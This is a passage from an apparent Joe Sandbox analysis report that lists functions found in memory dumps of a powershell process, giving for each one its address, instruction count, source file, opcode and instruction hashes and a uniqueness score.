                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0c766c83d7377526dbec197d3e1af04d2711f6d35a4d44f71f6896102f600ff5
                    • Instruction ID: 4cd7f229c8603a4716963852c4e6b050d539b783cc1e9dddc9abb9e68271436f
                    • Opcode Fuzzy Hash: 0c766c83d7377526dbec197d3e1af04d2711f6d35a4d44f71f6896102f600ff5
                    • Instruction Fuzzy Hash: 31A1BD35E1031A9FDB24DF24C884BDAB7B6EF89300F158595E409AB315DB74AE85CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326CD28 Relevance: .2, Instructions: 236COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a19646a2a1354b7e38b53c71dcfea9f00d4c9d3f88b4e5cccf807f4b66dd932
                    • Instruction ID: d472d72caec900c6fd357ce23046714350cd10683837a2f587967f50840f9eb4
                    • Opcode Fuzzy Hash: 1a19646a2a1354b7e38b53c71dcfea9f00d4c9d3f88b4e5cccf807f4b66dd932
                    • Instruction Fuzzy Hash: DDA14734A00709CFCB14EF64D48896EB7F2FF89714B14896AD44A9B364CB75EC82CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032671B0 Relevance: .2, Instructions: 223COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 10cf99aa75cbb126fccb44df0dd0b68682a602f9177bafe573695d047c42a4c4
                    • Instruction ID: b858ec18ed02562c477c8552f09c580348421f934da40f984163609e05af230c
                    • Opcode Fuzzy Hash: 10cf99aa75cbb126fccb44df0dd0b68682a602f9177bafe573695d047c42a4c4
                    • Instruction Fuzzy Hash: 76814C74B101148FC704EB69D594A6EBBFAAFC8315F158068D906DB399DF38DC81CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326D9D0 Relevance: .2, Instructions: 187COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3b012099de9cd0640e4d13d8f4b7ed4cc76c23348b35622349d65e42035fcb09
                    • Instruction ID: c60f5ae7c38f9fb95b314474560563a8de0f0058b6016ca0dd88497071c83844
                    • Opcode Fuzzy Hash: 3b012099de9cd0640e4d13d8f4b7ed4cc76c23348b35622349d65e42035fcb09
                    • Instruction Fuzzy Hash: D5513875B0811A9FCB10DB7CE8544EDBBB5EF8A220B1881A7E518DB241CB34DDD5CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032677F8 Relevance: .2, Instructions: 174COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b78be3d59c69474be84b58920399629d3ce0a02f7d3588a4d72178971d78368
                    • Instruction ID: febe3d0e3707d035ff27b7b54f78c63f0eeb9b11f04dc18276663a18a393de2f
                    • Opcode Fuzzy Hash: 5b78be3d59c69474be84b58920399629d3ce0a02f7d3588a4d72178971d78368
                    • Instruction Fuzzy Hash: 0651E134B046008FD314EB38D49092A77E6EFC9218B2549BAC14ACB365EF75EC86CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03260498 Relevance: .2, Instructions: 172COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 34f18d13ad82e6a62f075ca395c127ea5161643bbf00e5c9424b009dc1faca6f
                    • Instruction ID: d133ca726e5cf7bfbe1af9995a81ef113e65c675c54d4d6b131beeb35b523b59
                    • Opcode Fuzzy Hash: 34f18d13ad82e6a62f075ca395c127ea5161643bbf00e5c9424b009dc1faca6f
                    • Instruction Fuzzy Hash: D8614B70A24209DFDB18DF65D998AADBBB5BF88310F148029E406E72A4DB74ECC1DF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03263600 Relevance: .2, Instructions: 162COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9741541e481102a7e9b127ec3b390d99af8c20c4160466b0906e6e5db48f25a3
                    • Instruction ID: a9656fda5769889c5e7fe4e25c37285fd9d69e50747ea711b548d3b5d255b96b
                    • Opcode Fuzzy Hash: 9741541e481102a7e9b127ec3b390d99af8c20c4160466b0906e6e5db48f25a3
                    • Instruction Fuzzy Hash: 7351BD31641206CFCB20DF14CCD1BD9B3B1FF84314B1A8699C8559BB41D738B962CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BEC48 Relevance: .2, Instructions: 157COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca2d00806719c0bd6adfd69f352764db7ee9f08eba7a3e389a8c442e8000db0c
                    • Instruction ID: 8901b8ecfd983d031d7dc966958216b001043233a12eeeaa90e6b608818750b3
                    • Opcode Fuzzy Hash: ca2d00806719c0bd6adfd69f352764db7ee9f08eba7a3e389a8c442e8000db0c
                    • Instruction Fuzzy Hash: 9B51C038B043049FC704EF74E890AAA77A6EF84314F41C9B9D6468B794DFB8AD058B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326C6E0 Relevance: .1, Instructions: 144COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 33c6849a862b60828341bff9c2783e5d432c0b0a742aa9025340f72921465794
                    • Instruction ID: b847646fcb290c0a37ca27b82d3644ae13c48dbd14f91fb487b2e86125afc83f
                    • Opcode Fuzzy Hash: 33c6849a862b60828341bff9c2783e5d432c0b0a742aa9025340f72921465794
                    • Instruction Fuzzy Hash: 50515E74A102158FCB05EF69D99489EBBF5FF89310B1580A5E905EB366DB34EC41CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03264D80 Relevance: .1, Instructions: 122COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3b87c1e599d91cff8e8ce72c38177ce36b4673841c55fd2dd8bc00cf6b9ec1cb
                    • Instruction ID: 76536e2b9c55ddfaaae01fbceba9c090df2cc0f918197f63f842f6a37b7e23d6
                    • Opcode Fuzzy Hash: 3b87c1e599d91cff8e8ce72c38177ce36b4673841c55fd2dd8bc00cf6b9ec1cb
                    • Instruction Fuzzy Hash: C4419F70A102099FCB14EFA5E494AAEBBB6EF88304F144429E546DB390DB35DD81CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03260488 Relevance: .1, Instructions: 122COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d468a45855207b1e8b5baedc66a3c82e436172cb9b2f24f640557c98373f775e
                    • Instruction ID: 368318b6825e3ee414b65d9744b898a577a482b44b144e8290b7e278ed7e973e
                    • Opcode Fuzzy Hash: d468a45855207b1e8b5baedc66a3c82e436172cb9b2f24f640557c98373f775e
                    • Instruction Fuzzy Hash: 88419F70A24209DFCB18DFA5D998AADBBB5BF48310F048169E806E7395DB74E881DF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03260EF8 Relevance: .1, Instructions: 117COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f661c83df01be2a0892dd8951dd71f8c6acec0506a32b7b0440994dd61ba9de7
                    • Instruction ID: 06a6ff035171350035b8c3485eaecc255a2510da80ff1eaf7794033c4a651fb7
                    • Opcode Fuzzy Hash: f661c83df01be2a0892dd8951dd71f8c6acec0506a32b7b0440994dd61ba9de7
                    • Instruction Fuzzy Hash: 4041C135B002059FDB14EF6AD48059DB7E5EF84225F04C569D61ADB380EF35E945CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326CB80 Relevance: .1, Instructions: 112COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7f809ade720538ae0d4bc219b1a337359ba4bc0c294fea0eda9b522d3ea28a6c
                    • Instruction ID: eae4974772d65dfef028e3463b113e9da7595371da2a7b6a1a2aff57d3ac981e
                    • Opcode Fuzzy Hash: 7f809ade720538ae0d4bc219b1a337359ba4bc0c294fea0eda9b522d3ea28a6c
                    • Instruction Fuzzy Hash: A53177797143508FC715EB39E49065AB7A6EFC1620B1984BBC18A8F356CF70EC81C761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326ABF8 Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d72484671e239471f2b4e246fb4b4cc1574969a7e7c4538fec50b2ced0d25782
                    • Instruction ID: 7835e0dcb36f2d72d9bfdcf7827fe801d8ecd3e8c083b8061d96de522fd78c9c
                    • Opcode Fuzzy Hash: d72484671e239471f2b4e246fb4b4cc1574969a7e7c4538fec50b2ced0d25782
                    • Instruction Fuzzy Hash: A441BF78B102058FC714EF78D4889AEB7F2FF89200B11886AD906DB355CB70ED85CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326AF58 Relevance: .1, Instructions: 98COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 43c780e105a551139b4692896c281808b93fd76b69ab4bced5fe4469d2d69694
                    • Instruction ID: 72e0c8a52f3bafecd2b13ce3e440a30f8a7293159831c7a10618ab8df0f446fb
                    • Opcode Fuzzy Hash: 43c780e105a551139b4692896c281808b93fd76b69ab4bced5fe4469d2d69694
                    • Instruction Fuzzy Hash: 6F415E74A0030ACFCB10DF64D4949AEBBF2FF89314B10CA69D91A9B359D774E946CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03260360 Relevance: .1, Instructions: 93COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 156aa64f0b6b1e717ed92620bf07e72bf6bf306c1386063f158557ea9214b9e2
                    • Instruction ID: da5aa0b985d7e1168a47cfa97ec1609d06452fba88f84fe1bf54c28b052d6559
                    • Opcode Fuzzy Hash: 156aa64f0b6b1e717ed92620bf07e72bf6bf306c1386063f158557ea9214b9e2
                    • Instruction Fuzzy Hash: 5831A178B042468FDB05EF68C4905AE7BF2EFC9211B048569E945DB385DB34ED41CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032B9A68 Relevance: .1, Instructions: 93COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4d84ec9320bf527e50b35a16289abbf055149002662f4d31e11fd4a59a34007e
                    • Instruction ID: cc8f81d70635844b264a735d911eaee3d1f1705de49190ca7e19f988523a8de8
                    • Opcode Fuzzy Hash: 4d84ec9320bf527e50b35a16289abbf055149002662f4d31e11fd4a59a34007e
                    • Instruction Fuzzy Hash: 5E31DA75E002098FCF44DFA8D5849CDB7F1FF88314B1589A5E909AB329D771AE16CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BEC38 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 17cae7d4bf154526d200815c15482669153609412c50bc341f37c460cd25c072
                    • Instruction ID: dca5d091e37e3183f0864e3c5db5a4adc3b206d03ffb7314e63e33d2ed6cf795
                    • Opcode Fuzzy Hash: 17cae7d4bf154526d200815c15482669153609412c50bc341f37c460cd25c072
                    • Instruction Fuzzy Hash: 3431E1346047008FC715EF74D8806AA77A2FF85314F46CAACD2468F7A5CBB8AD09CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326AF68 Relevance: .1, Instructions: 91COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 98e687335cb84f66fce5a44741b42ee7c14fb04d7509f6cc11df6c04820c4b11
                    • Instruction ID: ec33dedcd1095c25e0247f4850e26422e45e2814dbf5c993dfd87e6e8e413b61
                    • Opcode Fuzzy Hash: 98e687335cb84f66fce5a44741b42ee7c14fb04d7509f6cc11df6c04820c4b11
                    • Instruction Fuzzy Hash: F6311A74A0030ACFCB14DF64D480AAEB7F6FF89314B10CA69D91A9B358DB75E945CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03264C1A Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 50042bc325cdec97e8c6da01d2d30fe2baaeb07b09df6e2f60fc561dbfe2884b
                    • Instruction ID: 6292b76e6a46958c94fea052d459544ec61b57e7b0e3784f3682cebd85209601
                    • Opcode Fuzzy Hash: 50042bc325cdec97e8c6da01d2d30fe2baaeb07b09df6e2f60fc561dbfe2884b
                    • Instruction Fuzzy Hash: 5B31D135E10118CFCB00EB54D880AAEB77AFF85314F018575D9069B345DF755D458BE2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BDA40 Relevance: .1, Instructions: 88COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 64a743416ff80188896bc04878f846d3311b751d592469cacdc88eb9f1ee6fda
                    • Instruction ID: 42dd6a554262683f27d960b0d2db45df3c146de3c53b1c9cffbb0ec896a98cb9
                    • Opcode Fuzzy Hash: 64a743416ff80188896bc04878f846d3311b751d592469cacdc88eb9f1ee6fda
                    • Instruction Fuzzy Hash: 9B315A75705301DFC715DF38C5808AAB7F6BF8525071889A9D45ACB361DB34ED42CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03264C20 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d2146c22b8b69e2272299109fcd0262dae2e26e5fb94bf499a4de7207b17f4da
                    • Instruction ID: 9eda96a4d31e0d6a10592a3f97d5cb9bbad19f7ed15563a3716118b6c611d0d3
                    • Opcode Fuzzy Hash: d2146c22b8b69e2272299109fcd0262dae2e26e5fb94bf499a4de7207b17f4da
                    • Instruction Fuzzy Hash: FF31E335E10118CFCB00EB95D884AAEB77AFF85314F018535D906AB385DF755D058BE2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326CC30 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a2b5df4bd0ee4ef888973fe833d1a231b44b3173397e2562c4a4dc0ca798e7a
                    • Instruction ID: 8306c437f0ee446e04e4bbee326a75147d1f38d8f5fcee5330a73a3b824ac7af
                    • Opcode Fuzzy Hash: 1a2b5df4bd0ee4ef888973fe833d1a231b44b3173397e2562c4a4dc0ca798e7a
                    • Instruction Fuzzy Hash: 1A21D3343242618FC728EF28D488A6EB7A79FC9610B19446BD046CB3A6DFB1DCC1C751
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03261768 Relevance: .1, Instructions: 81COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 715e05885a3a05806978488ac21cd45126dd39970e6b1e6fd7cbe74b06b01610
                    • Instruction ID: 5d81f07b8c6e9938bae77c753767fc0785dcf0c9b774d70d5d5b2ee62cf44411
                    • Opcode Fuzzy Hash: 715e05885a3a05806978488ac21cd45126dd39970e6b1e6fd7cbe74b06b01610
                    • Instruction Fuzzy Hash: D22123393142105FC715EB79E850A7E3BFADFC662030540AAE805CB791CF38EC868B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326BA01 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ed760f098298f7218f0bc6e6e1371e96c753bba59ae7351d2907f9a08a0e129c
                    • Instruction ID: 958ab1667c574e7d2852cdf883f0eea0bf4e5a8c2abf64555db16f5f04b9e396
                    • Opcode Fuzzy Hash: ed760f098298f7218f0bc6e6e1371e96c753bba59ae7351d2907f9a08a0e129c
                    • Instruction Fuzzy Hash: BA11C46260E3D05FCB138B7998A47527FB49F8B114F4E44CBC884CF1A7D5145C49CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03263518 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42e7c9c0d964fd56913c4d94c148c15f97aa62a053c0ae20474ca9008751c8ce
                    • Instruction ID: 34894f43b1c901635ee017d74a908b2a64cd7186e4141b0e2d53535d67f64f16
                    • Opcode Fuzzy Hash: 42e7c9c0d964fd56913c4d94c148c15f97aa62a053c0ae20474ca9008751c8ce
                    • Instruction Fuzzy Hash: A021B07AE002158FCB15DB69C05059AFBF5EF9C210B1981AADA44EB321D730DC80CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03263508 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 31692a9365cad901d4d83a4ed6f72db98237659fce052dcf2cc9ad74ec87db3e
                    • Instruction ID: 4383b7dbb332e2483f991a9b40b9d60daf7c3baa2d3cf6bf2d9867190f39c780
                    • Opcode Fuzzy Hash: 31692a9365cad901d4d83a4ed6f72db98237659fce052dcf2cc9ad74ec87db3e
                    • Instruction Fuzzy Hash: E4212579E042548FCB11DB68C06069AFBF4EF8D210B1985AADA44DB321D730DC81CBE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03260EE8 Relevance: .1, Instructions: 72COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 221f364f8ef0299db59b9afb0bf9dc99043b11a87cdf6f211415cd3e8fece859
                    • Instruction ID: 5a477696760466994cd03380c374e6e9c263238db6ad04366de58652d4237de4
                    • Opcode Fuzzy Hash: 221f364f8ef0299db59b9afb0bf9dc99043b11a87cdf6f211415cd3e8fece859
                    • Instruction Fuzzy Hash: 8F213775A043059FCB14EF69C4400ADBBF8EF85614704C969D106DB390DF35A885CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032B1DD0 Relevance: .1, Instructions: 70COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 134b0c89cb466551937e71c1e44f85236b51b6fcdbcd24862359bb07a4293f2a
                    • Instruction ID: f46dbc4542df592ac293a6c4b911400d2837aca94d2108ae0a4bae166b0df6fa
                    • Opcode Fuzzy Hash: 134b0c89cb466551937e71c1e44f85236b51b6fcdbcd24862359bb07a4293f2a
                    • Instruction Fuzzy Hash: 7E216F79B106008FC714DF38D4988697BF6FF8A35171984A9E416CB361DB31EC51CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BA0F8 Relevance: .1, Instructions: 68COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b9051575e558d1352ea45302c2de7dd9ebfc28a0115009e6b957a0b8825a7c83
                    • Instruction ID: 304aa46e23e3cc73b2c3be5db4df9ff956d56a7997de1243032c8c2505644c00
                    • Opcode Fuzzy Hash: b9051575e558d1352ea45302c2de7dd9ebfc28a0115009e6b957a0b8825a7c83
                    • Instruction Fuzzy Hash: 622133B1D117098FCB14DFA9D8801DEBBF1BF9D304B24866AE419A3300E774A940CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 032BA308 Relevance: .1, Instructions: 61COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 40846d8cf6635c953dcfefcead611e17af1b52515367dadb5336731914e33f81
                    • Instruction ID: 678b0ca1cf6ba0c0f8cf475171c4a5d1120c24ed7e8f65c131425f518221900e
                    • Opcode Fuzzy Hash: 40846d8cf6635c953dcfefcead611e17af1b52515367dadb5336731914e33f81
                    • Instruction Fuzzy Hash: 6D11CE317102018FC714AB29F48856EB3EAFBC8725B04C93AD50AC7748DF70E8468BD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03261298 Relevance: .1, Instructions: 57COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6182b1d32d6799b894efce65c73bb587368a060b5c50c8f2b964f0a943149a09
                    • Instruction ID: 563ee44627338d088c01446dd0f8836332ed66246302523e2fcb94f160990f67
                    • Opcode Fuzzy Hash: 6182b1d32d6799b894efce65c73bb587368a060b5c50c8f2b964f0a943149a09
                    • Instruction Fuzzy Hash: C311E0343047909FC3149B25E584A6A7BFAFF89211B04446EE543CB742CB35A846CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0326C641 Relevance: .1, Instructions: 55COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 276f14a96b82fd0f68c7991b1b942c2e2d7a4f8e6c985102c82c51549a0d8b1d
                    • Instruction ID: af2bb3d67584b80b194a618ee08cc65b7678a49c81c777e912ccf8d9a34cc40d
                    • Opcode Fuzzy Hash: 276f14a96b82fd0f68c7991b1b942c2e2d7a4f8e6c985102c82c51549a0d8b1d
                    • Instruction Fuzzy Hash: 2511A1757142218FCB04EF39E89892ABBF5FF8A25031480BAE056C7365CB31EC40CB54
